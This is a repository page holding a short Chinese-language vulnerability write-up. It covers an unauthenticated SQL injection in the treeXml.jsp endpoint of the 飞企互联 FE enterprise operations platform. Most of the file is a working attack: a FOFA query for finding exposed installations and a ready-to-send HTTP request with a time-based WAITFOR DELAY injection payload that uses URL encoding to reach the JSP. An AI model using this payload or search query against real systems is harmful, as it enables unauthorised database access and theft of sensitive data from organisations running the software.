admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞.md

18 lines
490 B
Markdown
Raw Normal View History

6.5更新漏洞
2024-06-05 10:17:32 +08:00
## 飞企互联-FE企业运营管理平台treeXml.jsp存在SQL注入漏洞
飞企互联-FE企业运营管理平台 treeXml.jsp 接口存在SQL注入漏洞未经授权攻击者可通过该漏洞获取数据库敏感信息。
## fofa
```
app="FE-协作平台"
```
## poc
```
GET /sys/treeXml.js%70?menuName=1';WAITFOR+DELAY+'0:0:5'--&type=function HTTP/1.1
Host: your-ip
```
![image-20240605095623810](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406050956915.png)
Reference in New Issue Copy Permalink